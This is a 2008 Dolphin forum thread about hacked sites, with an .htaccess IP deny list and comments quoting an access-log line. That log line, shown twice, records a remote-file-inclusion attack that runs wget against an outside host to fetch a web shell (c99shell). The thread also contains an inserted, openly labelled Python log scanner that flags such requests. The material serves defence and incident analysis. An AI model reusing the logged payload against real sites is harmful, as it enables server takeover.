praveenkv1988

Dolphin Security Issues :(

Today I happened to check a site that used Dolphin and was hacked. I found that they had deleted all the files from it and uploaded a script that fetches the contacts from orkut.com and sends mail with a virus link (I am not posting that link here as it may be used by someone).

I have found the Dolphin security issues that helped them to hack the sites. Currently I am in the process of developing a patch to fix all these issues. I know I will succeed in this.

I have checked that site and found many IPs that were used to hack the sites. I need to provide those IPs to everyone so that you can block them on your server.

To block these IPs on your host,

Open the file ".htaccess".

At the very beginning of it, add the following:


<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 72.37.237.58
deny from 209.147.127.217
deny from 64.106.212.3
deny from 207.249.0.39
deny from 61.100.0.185
deny from 75.102.21.29
deny from 82.165.253.62
deny from 212.122.200.198
deny from 61.222.167.139
deny from 204.2.183.2
deny from 62.65.159.212
deny from 61.152.188.244
deny from 66.98.214.4
deny from 216.180.239.124
deny from 209.147.127.216
deny from 216.17.101.237
deny from 74.52.133.2
deny from 89.108.67.119
deny from 67.228.37.156
deny from 195.70.36.107
deny from 85.235.153.11
deny from 202.164.225.11
deny from 70.85.102.132
deny from 66.218.77.68
deny from 203.146.102.38
deny from 72.9.246.154
deny from 66.113.100.51
deny from 79.180.146.69
deny from 193.34.16.75
deny from 72.36.159.108
deny from 216.127.94.127
deny from 83.170.74.164
deny from 213.186.38.21
deny from 207.210.91.2
deny from 67.228.181.76
deny from 202.221.143.111
deny from 64.15.136.210
deny from 203.157.185.8
deny from 200.149.77.40
deny from 217.172.29.12

Regards,

Praveen


Comments

sammie, 128 days ago
 
Strange, because I checked a hacked site too, and the logs show the install of the viruses and Trojans, and they all came from the following IPs; some were logged on at the same time, 2-3-4-5 of them at the same time.

125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute HTTP/1.1" 200 5 "http://www.DOLPHIN_SITE.com//ray/modules/global/inc/content.inc.php?sIncPath=http://xakforum.*****.ru/tmp_upload/files/c99shell.txt?"

 
sammie, 128 days ago
 
Strange, because I checked a hacked site too, and the logs show the install of the viruses and Trojans, and they all came from the following IPs; some were logged on at the same time, 2-3-4-5 of them at the same time.

Yet you don't list one of the following IPs.

125.164.213.29 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fhsphere%2Flocal%2Fhome%2Frprinc%2FDOLPHIN_SITE.com%2Fray%2Fmodules%2Fglobal%2Finc%2F&cmd=wget+http%3A%2F%2Fh1.ripway.com%2Fsava%2Fshell%2Fbikang.txt&cmd_txt=1&submit=Execute HTTP/1.1" 200 5 "http://www.DOLPHIN_SITE.com//ray/modules/global/inc/content.inc.php?sIncPath=http://xakforum.*****.ru/tmp_upload/files/c99shell.txt?"

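The access-log entry quoted in the comment above has a recognisable request shape (a remote URL passed in `sIncPath`, and a `cmd` parameter carrying a download command), and that shape can be searched for regardless of the source IP. As an added example, not part of the original post or comments and not BoonEx code, this Python script scans Apache combined-format log lines for both indicators, in the request and in the referer. The function names are hypothetical, and the hosts and IPs in `SAMPLE` are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache combined format: ip, timestamp, request line, status, size, optional referer
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+(?: "(?P<referer>[^"]*)")?'
)
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.I)      # value is itself a URL
FETCH_TOOLS = re.compile(r'\b(?:wget|curl|fetch|lwp-download)\b', re.I)

def findings_for_url(url):
    """Return reasons why the query string of `url` looks like RFI or web-shell use."""
    reasons = []
    # parse_qsl percent-decodes values, so encoded payloads are matched too
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if REMOTE_VALUE.match(value):
            reasons.append(f"remote URL in parameter '{name}'")
        if name.lower() in ("cmd", "exec", "command") and FETCH_TOOLS.search(value):
            reasons.append(f"download command in parameter '{name}'")
    return reasons

def scan(lines):
    """Yield (ip, status, reasons) for every log line with at least one finding."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        reasons = findings_for_url(m["target"])
        reasons += [r + " (referer)" for r in findings_for_url(m["referer"] or "")]
        if reasons:
            yield m["ip"], int(m["status"]), reasons

# Constructed sample lines (documentation IP ranges and example hosts)
SAMPLE = [
    '203.0.113.7 - - [09/Jul/2008:20:54:01 -0500] "GET //ray/modules/global/inc/content.inc.php?act=cmd&d=%2Fvar%2Fwww%2F&cmd=wget+http%3A%2F%2Ffiles.example.test%2Fs.txt&submit=Execute HTTP/1.1" 200 5 "http://www.site.example//ray/modules/global/inc/content.inc.php?sIncPath=http://files.example.test/shell.txt?"',
    '198.51.100.23 - - [09/Jul/2008:20:55:10 -0500] "GET /index.php?page=2 HTTP/1.1" 200 5120 "http://www.site.example/"',
    '192.0.2.44 - - [09/Jul/2008:20:56:42 -0500] "GET /ray/modules/global/inc/content.inc.php?sIncPath=ftp://files.example.test/x.txt%3F HTTP/1.1" 404 210 "-"',
]

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE):
        print(ip, status, "; ".join(reasons))
```

A 200 status on a flagged line deserves attention first, since the server answered the request. Sites that legitimately pass URLs in parameters (login redirects, for instance) will need an allow-list for those parameter names.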
 
 
DoLaugh, 127 days ago
 
Praveenkv....what kind of security pack are you offering? Will this work for me since I cannot use .htaccess files and my global setting is set to ON?
 
© 2008 BoonEx Ltd